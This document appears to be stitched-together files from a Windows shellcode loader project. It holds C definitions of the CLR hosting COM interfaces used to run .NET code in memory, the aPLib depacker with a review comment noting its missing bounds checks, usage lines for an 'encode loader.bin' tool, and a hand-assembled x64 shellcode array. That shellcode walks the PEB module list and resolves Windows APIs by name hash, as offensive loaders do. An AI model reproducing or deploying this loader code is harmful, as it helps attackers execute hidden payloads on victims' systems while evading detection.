367 DUMMY_METHOD(GetMethod_2);
368 DUMMY_METHOD(GetMethods);
369 DUMMY_METHOD(GetField);
370 DUMMY_METHOD(GetFields);
371 DUMMY_METHOD(GetProperty);
372 DUMMY_METHOD(GetProperty_2);
373 DUMMY_METHOD(GetProperties);
374 DUMMY_METHOD(GetMember_2);
375 DUMMY_METHOD(GetMembers);
376 DUMMY_METHOD(InvokeMember);
377 DUMMY_METHOD(UnderlyingSystemType);
378 DUMMY_METHOD(InvokeMember_2);
379
380 HRESULT (STDMETHODCALLTYPE *InvokeMember_3)(
381 IType *This,
382 BSTR name,
383 BindingFlags invokeAttr,
384 IBinder *Binder,
385 VARIANT Target,
386 SAFEARRAY *args,
387 VARIANT *pRetVal);
388
389 DUMMY_METHOD(GetConstructor);
390 DUMMY_METHOD(GetConstructor_2);
391 DUMMY_METHOD(GetConstructor_3);
392 DUMMY_METHOD(GetConstructors_2);
393 DUMMY_METHOD(TypeInitializer);
394 DUMMY_METHOD(GetMethod_3);
395 DUMMY_METHOD(GetMethod_4);
396 DUMMY_METHOD(GetMethod_5);
397 DUMMY_METHOD(GetMethod_6);
398 DUMMY_METHOD(GetMethods_2);
399 DUMMY_METHOD(GetField_2);
400 DUMMY_METHOD(GetFields_2);
401 DUMMY_METHOD(GetInterface_2);
402 DUMMY_METHOD(GetEvent_2);
403 DUMMY_METHOD(GetProperty_3);
404 DUMMY_METHOD(GetProperty_4);
405 DUMMY_METHOD(GetProperty_5);
406 DUMMY_METHOD(GetProperty_6);
407 DUMMY_METHOD(GetProperty_7);
408 DUMMY_METHOD(GetProperties_2);
409 DUMMY_METHOD(GetNestedTypes_2);
410 DUMMY_METHOD(GetNestedType_2);
411 DUMMY_METHOD(GetMember_3);
412 DUMMY_METHOD(GetMembers_2);
413 DUMMY_METHOD(Attributes);
414 DUMMY_METHOD(IsNotPublic);
415 DUMMY_METHOD(IsPublic);
416 DUMMY_METHOD(IsNestedPublic);
417 DUMMY_METHOD(IsNestedPrivate);
418 DUMMY_METHOD(IsNestedFamily);
419 DUMMY_METHOD(IsNestedAssembly);
420 DUMMY_METHOD(IsNestedFamANDAssem);
421 DUMMY_METHOD(IsNestedFamORAssem);
422 DUMMY_METHOD(IsAutoLayout);
423 DUMMY_METHOD(IsLayoutSequential);
424 DUMMY_METHOD(IsExplicitLayout);
425 DUMMY_METHOD(IsClass);
426 DUMMY_METHOD(IsInterface);
427 DUMMY_METHOD(IsValueType);
428 DUMMY_METHOD(IsAbstract);
429 DUMMY_METHOD(IsSealed);
430 DUMMY_METHOD(IsEnum);
431 DUMMY_METHOD(IsSpecialName);
432 DUMMY_METHOD(IsImport);
433 DUMMY_METHOD(IsSerializable);
434 DUMMY_METHOD(IsAnsiClass);
435 DUMMY_METHOD(IsUnicodeClass);
436 DUMMY_METHOD(IsAutoClass);
437 DUMMY_METHOD(IsArray);
438 DUMMY_METHOD(IsByRef);
439 DUMMY_METHOD(IsPointer);
440 DUMMY_METHOD(IsPrimitive);
441 DUMMY_METHOD(IsCOMObject);
442 DUMMY_METHOD(HasElementType);
443 DUMMY_METHOD(IsContextful);
444 DUMMY_METHOD(IsMarshalByRef);
445 DUMMY_METHOD(Equals_2);
446
447 END_INTERFACE
448 } TypeVtbl;
449
450 typedef struct ICLRRuntimeInfoVtbl
451 {
452 BEGIN_INTERFACE
453
454 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
455 ICLRRuntimeInfo * This,
456 /* [in] */ REFIID riid,
457 /* [iid_is][out] */
458 __RPC__deref_out void **ppvObject);
459
460 ULONG ( STDMETHODCALLTYPE *AddRef )(
461 ICLRRuntimeInfo * This);
462
463 ULONG ( STDMETHODCALLTYPE *Release )(
464 ICLRRuntimeInfo * This);
465
466 HRESULT ( STDMETHODCALLTYPE *GetVersionString )(
467 ICLRRuntimeInfo * This,
468 /* [size_is][out] */
469 __out_ecount_full_opt(*pcchBuffer) LPWSTR pwzBuffer,
470 /* [out][in] */ DWORD *pcchBuffer);
471
472 HRESULT ( STDMETHODCALLTYPE *GetRuntimeDirectory )(
473 ICLRRuntimeInfo * This,
474 /* [size_is][out] */
475 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
476 /* [out][in] */ DWORD *pcchBuffer);
477
478 HRESULT ( STDMETHODCALLTYPE *IsLoaded )(
479 ICLRRuntimeInfo * This,
480 /* [in] */ HANDLE hndProcess,
481 /* [retval][out] */ BOOL *pbLoaded);
482
483 HRESULT ( STDMETHODCALLTYPE *LoadErrorString )(
484 ICLRRuntimeInfo * This,
485 /* [in] */ UINT iResourceID,
486 /* [size_is][out] */
487 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
488 /* [out][in] */ DWORD *pcchBuffer,
489 /* [lcid][in] */ LONG iLocaleID);
490
491 HRESULT ( STDMETHODCALLTYPE *LoadLibrary )(
492 ICLRRuntimeInfo * This,
493 /* [in] */ LPCWSTR pwzDllName,
494 /* [retval][out] */ HMODULE *phndModule);
495
496 HRESULT ( STDMETHODCALLTYPE *GetProcAddress )(
497 ICLRRuntimeInfo * This,
498 /* [in] */ LPCSTR pszProcName,
499 /* [retval][out] */ LPVOID *ppProc);
500
501 HRESULT ( STDMETHODCALLTYPE *GetInterface )(
502 ICLRRuntimeInfo * This,
503 /* [in] */ REFCLSID rclsid,
504 /* [in] */ REFIID riid,
505 /* [retval][iid_is][out] */ LPVOID *ppUnk);
506
507 HRESULT ( STDMETHODCALLTYPE *IsLoadable )(
508 ICLRRuntimeInfo * This,
509 /* [retval][out] */ BOOL *pbLoadable);
510
511 HRESULT ( STDMETHODCALLTYPE *SetDefaultStartupFlags )(
512 ICLRRuntimeInfo * This,
513 /* [in] */ DWORD dwStartupFlags,
514 /* [in] */ LPCWSTR pwzHostConfigFile);
515
516 HRESULT ( STDMETHODCALLTYPE *GetDefaultStartupFlags )(
517 ICLRRuntimeInfo * This,
518 /* [out] */ DWORD *pdwStartupFlags,
519 /* [size_is][out] */
520 __out_ecount_full_opt(*pcchHostConfigFile) LPWSTR pwzHostConfigFile,
521 /* [out][in] */ DWORD *pcchHostConfigFile);
522
523 HRESULT ( STDMETHODCALLTYPE *BindAsLegacyV2Runtime )(
524 ICLRRuntimeInfo * This);
525
526 HRESULT ( STDMETHODCALLTYPE *IsStarted )(
527 ICLRRuntimeInfo * This,
528 /* [out] */ BOOL *pbStarted,
529 /* [out] */ DWORD *pdwStartupFlags);
530
531 END_INTERFACE
532 } ICLRRuntimeInfoVtbl;
533
534 typedef struct _ICLRRuntimeInfo {
535 ICLRRuntimeInfoVtbl *lpVtbl;
536 } ICLRRuntimeInfo;
537
538 typedef struct _Type {
539 TypeVtbl *lpVtbl;
540 } Type;
541
542 typedef struct ICLRMetaHostVtbl
543 {
544 BEGIN_INTERFACE
545
546 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
547 ICLRMetaHost * This,
548 /* [in] */ REFIID riid,
549 /* [iid_is][out] */
550 __RPC__deref_out void **ppvObject);
551
552 ULONG ( STDMETHODCALLTYPE *AddRef )(
553 ICLRMetaHost * This);
554
555 ULONG ( STDMETHODCALLTYPE *Release )(
556 ICLRMetaHost * This);
557
558 HRESULT ( STDMETHODCALLTYPE *GetRuntime )(
559 ICLRMetaHost * This,
560 /* [in] */ LPCWSTR pwzVersion,
561 /* [in] */ REFIID riid,
562 /* [retval][iid_is][out] */ LPVOID *ppRuntime);
563
564 HRESULT ( STDMETHODCALLTYPE *GetVersionFromFile )(
565 ICLRMetaHost * This,
566 /* [in] */ LPCWSTR pwzFilePath,
567 /* [size_is][out] */
568 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
569 /* [out][in] */ DWORD *pcchBuffer);
570
571 HRESULT ( STDMETHODCALLTYPE *EnumerateInstalledRuntimes )(
572 ICLRMetaHost * This,
573 /* [retval][out] */ IEnumUnknown **ppEnumerator);
574
575 HRESULT ( STDMETHODCALLTYPE *EnumerateLoadedRuntimes )(
576 ICLRMetaHost * This,
577 /* [in] */ HANDLE hndProcess,
578 /* [retval][out] */ IEnumUnknown **ppEnumerator);
579
580 HRESULT ( STDMETHODCALLTYPE *RequestRuntimeLoadedNotification )(
581 ICLRMetaHost * This,
582 /* [in] */ RuntimeLoadedCallbackFnPtr pCallbackFunction);
583
584 HRESULT ( STDMETHODCALLTYPE *QueryLegacyV2RuntimeBinding )(
585 ICLRMetaHost * This,
586 /* [in] */ REFIID riid,
587 /* [retval][iid_is][out] */ LPVOID *ppUnk);
588
589 HRESULT ( STDMETHODCALLTYPE *ExitProcess )(
590 ICLRMetaHost * This,
591 /* [in] */ INT32 iExitCode);
592
593 END_INTERFACE
594 } ICLRMetaHostVtbl;
595
596 typedef struct _ICLRMetaHost
597 {
598 ICLRMetaHostVtbl *lpVtbl;
599 } ICLRMetaHost;
600
601 typedef struct ICorRuntimeHostVtbl
602 {
603 BEGIN_INTERFACE
604
605 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
606 ICorRuntimeHost * This,
607 /* [in] */ REFIID riid,
608 /* [iid_is][out] */
609 __RPC__deref_out void **ppvObject);
610
611 ULONG ( STDMETHODCALLTYPE *AddRef )(
612 ICorRuntimeHost * This);
613
614 ULONG ( STDMETHODCALLTYPE *Release )(
615 ICorRuntimeHost * This);
616
617 HRESULT ( STDMETHODCALLTYPE *CreateLogicalThreadState )(
618 ICorRuntimeHost * This);
619
620 HRESULT ( STDMETHODCALLTYPE *DeleteLogicalThreadState )(
621 ICorRuntimeHost * This);
622
623 HRESULT ( STDMETHODCALLTYPE *SwitchInLogicalThreadState )(
624 ICorRuntimeHost * This,
625 /* [in] */ DWORD *pFiberCookie);
626
627 HRESULT ( STDMETHODCALLTYPE *SwitchOutLogicalThreadState )(
628 ICorRuntimeHost * This,
629 /* [out] */ DWORD **pFiberCookie);
630
631 HRESULT ( STDMETHODCALLTYPE *LocksHeldByLogicalThread )(
632 ICorRuntimeHost * This,
633 /* [out] */ DWORD *pCount);
634
635 HRESULT ( STDMETHODCALLTYPE *MapFile )(
636 ICorRuntimeHost * This,
637 /* [in] */ HANDLE hFile,
638 /* [out] */ HMODULE *hMapAddress);
639
640 HRESULT ( STDMETHODCALLTYPE *GetConfiguration )(
641 ICorRuntimeHost * This,
642 /* [out] */ ICorConfiguration **pConfiguration);
643
644 HRESULT ( STDMETHODCALLTYPE *Start )(
645 ICorRuntimeHost * This);
646
647 HRESULT ( STDMETHODCALLTYPE *Stop )(
648 ICorRuntimeHost * This);
649
650 HRESULT ( STDMETHODCALLTYPE *CreateDomain )(
651 ICorRuntimeHost * This,
652 /* [in] */ LPCWSTR pwzFriendlyName,
653 /* [in] */ IUnknown *pIdentityArray,
654 /* [out] */ IUnknown **pAppDomain);
655
656 HRESULT ( STDMETHODCALLTYPE *GetDefaultDomain )(
657 ICorRuntimeHost * This,
658 /* [out] */ IUnknown **pAppDomain);
659
660 HRESULT ( STDMETHODCALLTYPE *EnumDomains )(
661 ICorRuntimeHost * This,
662 /* [out] */ HDOMAINENUM *hEnum);
663
664 HRESULT ( STDMETHODCALLTYPE *NextDomain )(
665 ICorRuntimeHost * This,
666 /* [in] */ HDOMAINENUM hEnum,
667 /* [out] */ IUnknown **pAppDomain);
668
669 HRESULT ( STDMETHODCALLTYPE *CloseEnum )(
670 ICorRuntimeHost * This,
671 /* [in] */ HDOMAINENUM hEnum);
672
673 HRESULT ( STDMETHODCALLTYPE *CreateDomainEx )(
674 ICorRuntimeHost * This,
675 /* [in] */ LPCWSTR pwzFriendlyName,
676 /* [in] */ IUnknown *pSetup,
677 /* [in] */ IUnknown *pEvidence,
678 /* [out] */ IUnknown **pAppDomain);
679
680 HRESULT ( STDMETHODCALLTYPE *CreateDomainSetup )(
681 ICorRuntimeHost * This,
682 /* [out] */ IUnknown **pAppDomainSetup);
683
684 HRESULT ( STDMETHODCALLTYPE *CreateEvidence )(
685 ICorRuntimeHost * This,
686 /* [out] */ IUnknown **pEvidence);
687
688 HRESULT ( STDMETHODCALLTYPE *UnloadDomain )(
689 ICorRuntimeHost * This,
690 /* [in] */ IUnknown *pAppDomain);
691
692 HRESULT ( STDMETHODCALLTYPE *CurrentDomain )(
693 ICorRuntimeHost * This,
694 /* [out] */ IUnknown **pAppDomain);
695
696 END_INTERFACE
697 } ICorRuntimeHostVtbl;
698
699 typedef struct _ICorRuntimeHost {
700 ICorRuntimeHostVtbl *lpVtbl;
701 } ICorRuntimeHost;
702
703 #undef DUMMY_METHOD
704 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IMethodInfo *This)
705
706 typedef struct _MethodInfoVtbl {
707 BEGIN_INTERFACE
708
709 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
710 IMethodInfo *This,
711 /* [in] */ REFIID riid,
712 /* [iid_is][out] */
713 __RPC__deref_out void **ppvObject);
714
715 ULONG ( STDMETHODCALLTYPE *AddRef )(
716 IMethodInfo *This);
717
718 ULONG ( STDMETHODCALLTYPE *Release )(
719 IMethodInfo *This);
720
721 DUMMY_METHOD(GetTypeInfoCount);
722 DUMMY_METHOD(GetTypeInfo);
723 DUMMY_METHOD(GetIDsOfNames);
724 DUMMY_METHOD(Invoke);
725
726 DUMMY_METHOD(ToString);
727 DUMMY_METHOD(Equals);
728 DUMMY_METHOD(GetHashCode);
729 DUMMY_METHOD(GetType);
730 DUMMY_METHOD(MemberType);
731 DUMMY_METHOD(name);
732 DUMMY_METHOD(DeclaringType);
733 DUMMY_METHOD(ReflectedType);
734 DUMMY_METHOD(GetCustomAttributes);
735 DUMMY_METHOD(GetCustomAttributes_2);
736 DUMMY_METHOD(IsDefined);
737
738 HRESULT ( STDMETHODCALLTYPE *GetParameters)(
739 IMethodInfo *This,
740 SAFEARRAY **pRetVal);
741
742 DUMMY_METHOD(GetMethodImplementationFlags);
743 DUMMY_METHOD(MethodHandle);
744 DUMMY_METHOD(Attributes);
745 DUMMY_METHOD(CallingConvention);
746 DUMMY_METHOD(Invoke_2);
747 DUMMY_METHOD(IsPublic);
748 DUMMY_METHOD(IsPrivate);
749 DUMMY_METHOD(IsFamily);
750 DUMMY_METHOD(IsAssembly);
751 DUMMY_METHOD(IsFamilyAndAssembly);
752 DUMMY_METHOD(IsFamilyOrAssembly);
753 DUMMY_METHOD(IsStatic);
754 DUMMY_METHOD(IsFinal);
755 DUMMY_METHOD(IsVirtual);
756 DUMMY_METHOD(IsHideBySig);
757 DUMMY_METHOD(IsAbstract);
758 DUMMY_METHOD(IsSpecialName);
759 DUMMY_METHOD(IsConstructor);
760
761 HRESULT ( STDMETHODCALLTYPE *Invoke_3 )(
762 IMethodInfo *This,
763 VARIANT obj,
764 SAFEARRAY *parameters,
765 VARIANT *ret);
766
767 DUMMY_METHOD(returnType);
768 DUMMY_METHOD(ReturnTypeCustomAttributes);
769 DUMMY_METHOD(GetBaseDefinition);
770
771 END_INTERFACE
772 } MethodInfoVtbl;
773
774 typedef struct _MethodInfo {
775 MethodInfoVtbl *lpVtbl;
776 } MethodInfo;
777
778 typedef struct ICorConfigurationVtbl
779 {
780 BEGIN_INTERFACE
781
782 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
783 ICorConfiguration * This,
784 /* [in] */ REFIID riid,
785 /* [iid_is][out] */
786 __RPC__deref_out void **ppvObject);
787
788 ULONG ( STDMETHODCALLTYPE *AddRef )(
789 ICorConfiguration * This);
790
791 ULONG ( STDMETHODCALLTYPE *Release )(
792 ICorConfiguration * This);
793
794 HRESULT ( STDMETHODCALLTYPE *SetGCThreadControl )(
795 ICorConfiguration * This,
796 /* [in] */ IGCThreadControl *pGCThreadControl);
797
798 HRESULT ( STDMETHODCALLTYPE *SetGCHostControl )(
799 ICorConfiguration * This,
800 /* [in] */ IGCHostControl *pGCHostControl);
801
802 HRESULT ( STDMETHODCALLTYPE *SetDebuggerThreadControl )(
803 ICorConfiguration * This,
804 /* [in] */ IDebuggerThreadControl *pDebuggerThreadControl);
805
806 HRESULT ( STDMETHODCALLTYPE *AddDebuggerSpecialThread )(
807 ICorConfiguration * This,
808 /* [in] */ DWORD dwSpecialThreadId);
809
810 END_INTERFACE
811 } ICorConfigurationVtbl;
812
813 typedef struct _ICorConfiguration
814 {
815 ICorConfigurationVtbl *lpVtbl;
816 }ICorConfiguration;
817
818 typedef struct IGCThreadControlVtbl
819 {
820 BEGIN_INTERFACE
821
822 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
823 IGCThreadControl * This,
824 /* [in] */ REFIID riid,
825 /* [iid_is][out] */
826 __RPC__deref_out void **ppvObject);
827
828 ULONG ( STDMETHODCALLTYPE *AddRef )(
829 IGCThreadControl * This);
830
831 ULONG ( STDMETHODCALLTYPE *Release )(
832 IGCThreadControl * This);
833
834 HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForSuspension )(
835 IGCThreadControl * This);
836
837 HRESULT ( STDMETHODCALLTYPE *SuspensionStarting )(
838 IGCThreadControl * This);
839
840 HRESULT ( STDMETHODCALLTYPE *SuspensionEnding )(
841 IGCThreadControl * This,
842 DWORD Generation);
843
844 END_INTERFACE
845 } IGCThreadControlVtbl;
846
847 typedef struct _IGCThreadControl
848 {
849 IGCThreadControlVtbl *lpVtbl;
850 }IGCThreadControl;
851
852 typedef struct IGCHostControlVtbl
853 {
854 BEGIN_INTERFACE
855
856 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
857 IGCHostControl * This,
858 /* [in] */ REFIID riid,
859 /* [iid_is][out] */
860 __RPC__deref_out void **ppvObject);
861
862 ULONG ( STDMETHODCALLTYPE *AddRef )(
863 IGCHostControl * This);
864
865 ULONG ( STDMETHODCALLTYPE *Release )(
866 IGCHostControl * This);
867
868 HRESULT ( STDMETHODCALLTYPE *RequestVirtualMemLimit )(
869 IGCHostControl * This,
870 /* [in] */ SIZE_T sztMaxVirtualMemMB,
871 /* [out][in] */ SIZE_T *psztNewMaxVirtualMemMB);
872
873 END_INTERFACE
874 } IGCHostControlVtbl;
875
876 typedef struct _IGCHostControl
877 {
878 IGCHostControlVtbl *lpVtbl;
879 } IGCHostControl;
880
881 typedef struct IDebuggerThreadControlVtbl
882 {
883 BEGIN_INTERFACE
884
885 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
886 IDebuggerThreadControl * This,
887 /* [in] */ REFIID riid,
888 /* [iid_is][out] */
889 __RPC__deref_out void **ppvObject);
890
891 ULONG ( STDMETHODCALLTYPE *AddRef )(
892 IDebuggerThreadControl * This);
893
894 ULONG ( STDMETHODCALLTYPE *Release )(
895 IDebuggerThreadControl * This);
896
897 HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForDebugger)(
898 IDebuggerThreadControl * This);
899
900 HRESULT ( STDMETHODCALLTYPE *ReleaseAllRuntimeThreads)(
901 IDebuggerThreadControl * This);
902
903 HRESULT ( STDMETHODCALLTYPE *StartBlockingForDebugger)(
904 IDebuggerThreadControl * This,
905 DWORD dwUnused);
906
907 END_INTERFACE
908 } IDebuggerThreadControlVtbl;
909
910 typedef struct _IDebuggerThreadControl {
911 IDebuggerThreadControlVtbl *lpVtbl;
912 } IDebuggerThreadControl;
913
914 #endif
915
0 /*
1 * aPLib compression library - the smaller the better :)
2 *
3 * C depacker
4 *
5 * Copyright (c) 1998-2014 Joergen Ibsen
6 * All Rights Reserved
7 *
8 * http://www.ibsensoftware.com/
9 */
10
11 #include "depack.h"
12
13 /* internal data structure */
14 struct APDSTATE {
15 const unsigned char *source;
16 unsigned char *destination;
17 unsigned int tag;
18 unsigned int bitcount;
19 };
20
21 static unsigned int aP_getbit(struct APDSTATE *ud)
22 {
23 unsigned int bit;
24
25 /* check if tag is empty */
26 if (!ud->bitcount--) {
27 /* load next tag */
28 ud->tag = *ud->source++;
29 ud->bitcount = 7;
30 }
31
32 /* shift bit out of tag */
33 bit = (ud->tag >> 7) & 0x01;
34 ud->tag <<= 1;
35
36 return bit;
37 }
38
39 static unsigned int aP_getgamma(struct APDSTATE *ud)
40 {
41 unsigned int result = 1;
42
43 /* input gamma2-encoded bits */
44 do {
45 result = (result << 1) + aP_getbit(ud);
46 } while (aP_getbit(ud));
47
48 return result;
49 }
50
51 unsigned int aP_depack(const void *source, void *destination)
52 {
53 struct APDSTATE ud;
54 unsigned int offs, len, R0, LWM;
55 int done;
56 int i;
57
58 ud.source = (const unsigned char *) source;
59 ud.destination = (unsigned char *) destination;
60 ud.bitcount = 0;
61
62 R0 = (unsigned int) -1;
63 LWM = 0;
64 done = 0;
65
66 /* first byte verbatim */
67 *ud.destination++ = *ud.source++;
68
69 /* main decompression loop */
70 while (!done) {
71 if (aP_getbit(&ud)) {
72 if (aP_getbit(&ud)) {
73 if (aP_getbit(&ud)) {
74 offs = 0;
75
76 for (i = 4; i; i--) {
77 offs = (offs << 1) + aP_getbit(&ud);
78 }
79
80 if (offs) {
81 *ud.destination = *(ud.destination - offs);
82 ud.destination++;
83 }
84 else {
85 *ud.destination++ = 0x00;
86 }
87
88 LWM = 0;
89 }
90 else {
91 offs = *ud.source++;
92
93 len = 2 + (offs & 0x0001);
94
95 offs >>= 1;
96
97 if (offs) {
98 for (; len; len--) {
99 *ud.destination = *(ud.destination - offs);
100 ud.destination++;
101 }
102 }
103 else {
104 done = 1;
105 }
106
107 R0 = offs;
108 LWM = 1;
109 }
110 }
111 else {
112 offs = aP_getgamma(&ud);
113
114 if ((LWM == 0) && (offs == 2)) {
115 offs = R0;
116
117 len = aP_getgamma(&ud);
118
119 for (; len; len--) {
120 *ud.destination = *(ud.destination - offs);
121 ud.destination++;
122 }
123 }
124 else {
125 if (LWM == 0) {
126 offs -= 3;
127 }
128 else {
129 offs -= 2;
130 }
131
132 offs <<= 8;
133 offs += *ud.source++;
134
135 len = aP_getgamma(&ud);
136
137 if (offs >= 32000) {
138 len++;
139 }
140 if (offs >= 1280) {
141 len++;
142 }
143 if (offs < 128) {
144 len += 2;
145 }
146
147 for (; len; len--) {
148 *ud.destination = *(ud.destination - offs);
149 ud.destination++;
150 }
151
152 R0 = offs;
153 }
154
155 LWM = 1;
156 }
157 }
158 else {
159 *ud.destination++ = *ud.source++;
160 LWM = 0;
161 }
162 }
163
164 return (unsigned int) (ud.destination - (unsigned char *) destination);
165 }
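Review bot: `aP_depack(const void *source, void *destination)` takes no input or output length, so nothing in this file bounds its accesses: `aP_getbit` and the literal paths advance `ud.source` unchecked, every match copy dereferences `*(ud.destination - offs)` without comparing `offs` to the bytes already written (and `R0` starts as `(unsigned int) -1`), and the loop ends only when the stream supplies the zero-offset end marker. A truncated or corrupted stream would therefore read and write outside both buffers. If any caller can receive data that did not come from the project's own packer, the length-checked depacker shipped with aPLib (`aP_depack_safe`) is the better fit. At minimum, state the contract above the function, for example `/* No bounds checks: source must be a well-formed aPLib stream and destination must hold the whole unpacked output. */`.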
0
1 compile: cl encode.c mmap-windows.c
2 usage: encode loader.bin base64.txt
0
1 // Target architecture : X86 64
2
3 #define DECODE_SIZE 353
4
5 char DECODE[] = {
6 /* 0000 */ "\x56" /* push rsi */
7 /* 0001 */ "\x53" /* push rbx */
8 /* 0002 */ "\x57" /* push rdi */
9 /* 0003 */ "\x55" /* push rbp */
10 /* 0004 */ "\xeb\x0a" /* jmp 0x10 */
11 /* 0006 */ "\x5d" /* pop rbp */
12 /* 0007 */ "\x31\xc0" /* xor eax, eax */
13 /* 0009 */ "\xb0\x9b" /* mov al, 0x9b */
14 /* 000B */ "\x48\x01\xe8" /* add rax, rbp */
15 /* 000E */ "\xff\xe0" /* jmp rax */
16 /* 0010 */ "\xe8\xf1\xff\xff\xff" /* call 6 */
17 /* 0015 */ "\x56" /* push rsi */
18 /* 0016 */ "\x53" /* push rbx */
19 /* 0017 */ "\x57" /* push rdi */
20 /* 0018 */ "\x55" /* push rbp */
21 /* 0019 */ "\x41\x89\xc0" /* mov r8d, eax */
22 /* 001C */ "\xeb\x72" /* jmp 0x90 */
23 /* 001E */ "\x41\x59" /* pop r9 */
24 /* 0020 */ "\x6a\x60" /* push 0x60 */
25 /* 0022 */ "\x41\x5b" /* pop r11 */
26 /* 0024 */ "\x65\x49\x8b\x03" /* mov rax, qword ptr gs:[r11] */
27 /* 0028 */ "\x48\x8b\x40\x18" /* mov rax, qword ptr [rax + 0x18] */
28 /* 002C */ "\x48\x8b\x78\x10" /* mov rdi, qword ptr [rax + 0x10] */
29 /* 0030 */ "\xeb\x03" /* jmp 0x35 */
30 /* 0032 */ "\x48\x8b\x3f" /* mov rdi, qword ptr [rdi] */
31 /* 0035 */ "\x48\x8b\x5f\x30" /* mov rbx, qword ptr [rdi + 0x30] */
32 /* 0039 */ "\x48\x85\xdb" /* test rbx, rbx */
33 /* 003C */ "\x74\x4b" /* je 0x89 */
34 /* 003E */ "\x8b\x73\x3c" /* mov esi, dword ptr [rbx + 0x3c] */
35 /* 0041 */ "\x44\x01\xde" /* add esi, r11d */
36 /* 0044 */ "\x8b\x4c\x33\x28" /* mov ecx, dword ptr [rbx + rsi + 0x28] */
37 /* 0048 */ "\x67\xe3\xe7" /* jecxz 0x32 */
38 /* 004B */ "\x48\x8d\x74\x0b\x0c" /* lea rsi, qword ptr [rbx + rcx + 0xc] */
39 /* 0050 */ "\xad" /* lodsd eax, dword ptr [rsi] */
40 /* 0051 */ "\x41\xff\xd1" /* call r9 */
41 /* 0054 */ "\x50" /* push rax */
42 /* 0055 */ "\x41\x5a" /* pop r10 */
43 /* 0057 */ "\xad" /* lodsd eax, dword ptr [rsi] */
44 /* 0058 */ "\xad" /* lodsd eax, dword ptr [rsi] */
45 /* 0059 */ "\xad" /* lodsd eax, dword ptr [rsi] */
46 /* 005A */ "\x91" /* xchg eax, ecx */
47 /* 005B */ "\x67\xe3\xd4" /* jecxz 0x32 */
48 /* 005E */ "\xad" /* lodsd eax, dword ptr [rsi] */
49 /* 005F */ "\x92" /* xchg eax, edx */
50 /* 0060 */ "\x48\x01\xda" /* add rdx, rbx */
51 /* 0063 */ "\xad" /* lodsd eax, dword ptr [rsi] */
52 /* 0064 */ "\x95" /* xchg eax, ebp */
53 /* 0065 */ "\x48\x01\xdd" /* add rbp, rbx */
54 /* 0068 */ "\xad" /* lodsd eax, dword ptr [rsi] */
55 /* 0069 */ "\x96" /* xchg eax, esi */
56 /* 006A */ "\x48\x01\xde" /* add rsi, rbx */
57 /* 006D */ "\x48\x8b\x44\x8d\xfc" /* mov rax, qword ptr [rbp + rcx*4 - 4] */
58 /* 0072 */ "\x41\xff\xd1" /* call r9 */
59 /* 0075 */ "\x44\x01\xd0" /* add eax, r10d */
60 /* 0078 */ "\x44\x39\xc0" /* cmp eax, r8d */
61 /* 007B */ "\xe0\xf0" /* loopne 0x6d */
62 /* 007D */ "\x75\xb3" /* jne 0x32 */
63 /* 007F */ "\x0f\xb7\x04\x4e" /* movzx eax, word ptr [rsi + rcx*2] */
64 /* 0083 */ "\x8b\x04\x82" /* mov eax, dword ptr [rdx + rax*4] */
65 /* 0086 */ "\x48\x01\xc3" /* add rbx, rax */
66 /* 0089 */ "\x48\x93" /* xchg rax, rbx */
67 /* 008B */ "\x5d" /* pop rbp */
68 /* 008C */ "\x5f" /* pop rdi */
69 /* 008D */ "\x5b" /* pop rbx */
70 /* 008E */ "\x5e" /* pop rsi */
71 /* 008F */ "\xc3" /* ret */
72 /* 0090 */ "\xe8\x89\xff\xff\xff" /* call 0x1e */
73 /* 0095 */ "\x52" /* push rdx */
74 /* 0096 */ "\x56" /* push rsi */
75 /* 0097 */ "\x96" /* xchg eax, esi */
76 /* 0098 */ "\x48\x01\xde" /* add rsi, rbx */
77 /* 009B */ "\x31\xc0" /* xor eax, eax */
78 /* 009D */ "\x99" /* cdq */
79 /* 009E */ "\xac" /* lodsb al, byte ptr [rsi] */
80 /* 009F */ "\x08\xc0" /* or al, al */
81 /* 00A1 */ "\x74\x09" /* je 0xac */
82 /* 00A3 */ "\x0c\x20" /* or al, 0x20 */
83 /* 00A5 */ "\x01\xc2" /* add edx, eax */
84 /* 00A7 */ "\xc1\xca\x08" /* ror edx, 8 */
85 /* 00AA */ "\xeb\xf2" /* jmp 0x9e */
86 /* 00AC */ "\x92" /* xchg eax, edx */
87 /* 00AD */ "\x5e" /* pop rsi */
88 /* 00AE */ "\x5a" /* pop rdx */
89 /* 00AF */ "\xc3" /* ret */
90 /* 00B0 */ "\x48\x99" /* cqo */
91 /* 00B2 */ "\xb2\xb1" /* mov dl, 0xb1 */
92 /* 00B4 */ "\x48\x01\xd0" /* add rax, rdx */
93 /* 00B7 */ "\x48\x83\xec\x78" /* sub rsp, 0x78 */
94 /* 00BB */ "\x54" /* push rsp */
95 /* 00BC */ "\x5b" /* pop rbx */
96 /* 00BD */ "\x48\x8d\x7b\x48" /* lea rdi, qword ptr [rbx + 0x48] */
97 /* 00C1 */ "\x48\xab" /* stosq qword ptr [rdi], rax */
98 /* 00C3 */ "\xb8\x39\x81\x4f\x45" /* mov eax, 0x454f8139 */
99 /* 00C8 */ "\xff\xd5" /* call rbp */
100 /* 00CA */ "\x48\xab" /* stosq qword ptr [rdi], rax */
101 /* 00CC */ "\xb8\xd7\x0e\xf5\xe0" /* mov eax, 0xe0f50ed7 */
102 /* 00D1 */ "\xff\xd5" /* call rbp */
103 /* 00D3 */ "\x48\xab" /* stosq qword ptr [rdi], rax */
104 /* 00D5 */ "\xb8\x57\x6d\x60\x46" /* mov eax, 0x46606d57 */
105 /* 00DA */ "\xff\xd5" /* call rbp */
106 /* 00DC */ "\x48\xab" /* stosq qword ptr [rdi], rax */
107 /* 00DE */ "\xb8\xb1\x64\x4a\x3f" /* mov eax, 0x3f4a64b1 */
108 /* 00E3 */ "\xff\xd5" /* call rbp */
